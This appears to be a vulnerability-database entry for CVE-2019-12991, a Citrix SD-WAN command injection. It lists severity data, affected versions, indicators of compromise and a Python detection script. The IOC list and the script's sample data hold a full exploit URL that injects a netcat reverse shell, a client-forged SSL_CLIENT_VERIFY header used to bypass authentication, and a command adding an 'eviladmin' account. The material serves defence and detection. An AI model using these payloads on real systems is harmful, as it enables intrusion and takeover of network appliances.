cbcvebase.
CVE-2019-12991
published 2019-07-16

CVE-2019-12991: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 5 of 6).

Priority: P1 (91), high, 8.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 73.88% (99.4th percentile)

Affected

6 ranges
Vendor    Product                 Version range          Fixed in
citrix    citrix_sd-wan
citrix    netscaler_adc_gateway
citrix    netscaler_sd-wan        >= 10.0.0 < 10.0.8     10.0.8
citrix    sd-wan
citrix    sd-wan                  >= 10.2.0 < 10.2.3     10.2.3
citrix    xenserver

Detection & IOCs (extracted from sources)

path:    /cgi-bin/installpatch.cgi
url:     /cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`
path:    /sdwan/nitro/v1/config/get_package_file
command: sudo nc -nv %s %d -e /bin/bash
command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1
path:    /tmp/token_
path:    /home/talariuser/bin/user_management.pl
  • Detect HTTP GET requests to /cgi-bin/installpatch.cgi containing backtick-wrapped OS commands in the 'installfile' parameter, indicative of command injection exploitation.
  • Alert on HTTP requests to /cgi-bin/installpatch.cgi where the 'installfile' query parameter contains shell metacharacters such as backticks or pipe characters.
  • Monitor for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download that carry an 'SSL_CLIENT_VERIFY: SUCCESS' header supplied by the client (present in the request itself rather than populated by the TLS layer), as this is used to bypass authentication in the chained exploit.
  • Look for execution of 'nc' or 'netcat' with '-e /bin/bash' arguments spawned by the web server process (e.g., apache/httpd), indicating successful reverse shell via CVE-2019-12991.
  • Monitor for execution of user_management.pl with 'addUser' arguments from non-administrative sessions, indicating post-exploitation privilege escalation on the appliance.
  • The command injection (CVE-2019-12991) requires prior authentication; however, it can be chained with the unauthenticated SQL injection (CVE-2019-12989) to achieve full unauthenticated RCE. Detection logic should cover both the standalone authenticated case and the chained unauthenticated exploit path.
  • The swc-token value in the installpatch.cgi exploit URL is generated dynamically (a random 5-digit integer) during the SQL injection phase; detection rules should match on the parameter name rather than on a static token value.
  • The exploit treats a ReadTimeout on the command injection request as its success indicator (the reverse shell blocks the response), so network-level detection should not rely solely on HTTP response codes for this endpoint.
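The request-side rules in the list above, implemented as an added example; this is not code from cbcvebase, Citrix or the exploit's author. It assumes request records already parsed into method/URL/headers dictionaries, as a reverse proxy or WAF log would provide; the sample records are constructed for the demonstration (record 0 is the exploit URL quoted in the IOC list). The rule goes slightly beyond the list by flagging $(...) and other shell metacharacters in 'installfile', not only backticks and pipes, and it matches swc-token by parameter name, not value.

```python
"""Detection logic for the CVE-2019-12991 / CVE-2019-12989 request patterns
listed above, run over constructed request records (not real logs)."""

import re
from urllib.parse import parse_qs, urlsplit

# Paths named in the IOC list.
INSTALLPATCH_PATH = "/cgi-bin/installpatch.cgi"
PACKAGE_FILE_PATH = "/sdwan/nitro/v1/config/get_package_file"

# Shell metacharacters that never belong in a patch file name.
# Backtick and $ cover the known exploit and $(...) variants; | ; & and
# redirects cover other ways of smuggling a second command.
SHELL_META = re.compile(r"[`$|;&<>\r\n]")


def _headers_lower(headers):
    # Normalise names so "SSL_CLIENT_VERIFY", "ssl-client-verify" etc. all match.
    return {k.lower().replace("-", "_"): v for k, v in headers.items()}


def check_request(req):
    """Return a list of alert strings for one request record.

    req: {"method": str, "url": str, "headers": dict, "status": int|None}
    The decision is made on the request alone; the status code is ignored on
    purpose, since a reverse shell leaves the installpatch.cgi response hanging.
    """
    alerts = []
    parts = urlsplit(req["url"])
    query = parse_qs(parts.query, keep_blank_values=True)  # values come back URL-decoded

    if parts.path == INSTALLPATCH_PATH:
        for value in query.get("installfile", []):
            if SHELL_META.search(value):
                detail = "installfile=%r" % value
                if "swc-token" in query:  # match on the parameter name, not its value
                    detail += " with swc-token present"
                alerts.append("CVE-2019-12991 command injection attempt: " + detail)

    if (parts.path == PACKAGE_FILE_PATH
            and req["method"].upper() == "POST"
            and query.get("action") == ["file_download"]):
        hdrs = _headers_lower(req.get("headers", {}))
        if hdrs.get("ssl_client_verify", "").strip().upper() == "SUCCESS":
            alerts.append("CVE-2019-12989 auth bypass attempt: client-supplied "
                          "SSL_CLIENT_VERIFY: SUCCESS on get_package_file")
    return alerts


def scan(records):
    """Run check_request over an iterable of records; return (index, alert) pairs."""
    hits = []
    for i, rec in enumerate(records):
        for alert in check_request(rec):
            hits.append((i, alert))
    return hits


# Constructed sample traffic (not captured data). Record 0 is the exploit URL
# from the IOC list; record 3 uses the $(...) form a backtick-only rule would miss.
SAMPLE_REQUESTS = [
    {"method": "GET",
     "url": "/cgi-bin/installpatch.cgi?swc-token=01234&installfile="
            "`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`",
     "headers": {}, "status": None},                      # timed out, no response seen
    {"method": "GET",
     "url": "/cgi-bin/installpatch.cgi?swc-token=54321&installfile=patch-10.2.3.tar.gz",
     "headers": {}, "status": 200},                       # legitimate patch install
    {"method": "POST",
     "url": PACKAGE_FILE_PATH + "?action=file_download",
     "headers": {"SSL_CLIENT_VERIFY": "SUCCESS", "Content-Type": "application/json"},
     "status": 200},                                       # header forged by the client
    {"method": "GET",
     "url": "/cgi-bin/installpatch.cgi?installfile=%24%28id%29",
     "headers": {}, "status": 500},                       # $(id) variant
    {"method": "POST",
     "url": PACKAGE_FILE_PATH + "?action=file_download",
     "headers": {"Content-Type": "application/json"}, "status": 401},  # no forged header
]

if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_REQUESTS):
        print("record %d: %s" % (idx, alert))
```

Records 0, 2 and 3 alert; records 1 and 4 do not. The status field is carried only so the sample shows why it is ignored: record 0 never received a response, exactly the case the ReadTimeout note describes.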

CVSS provenance

Source      Version  Score  Severity  Vector
nvd         v3.1     8.8    HIGH      CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0     9.0    CRITICAL  AV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck            8.8    HIGH
cisa                 8.8    HIGH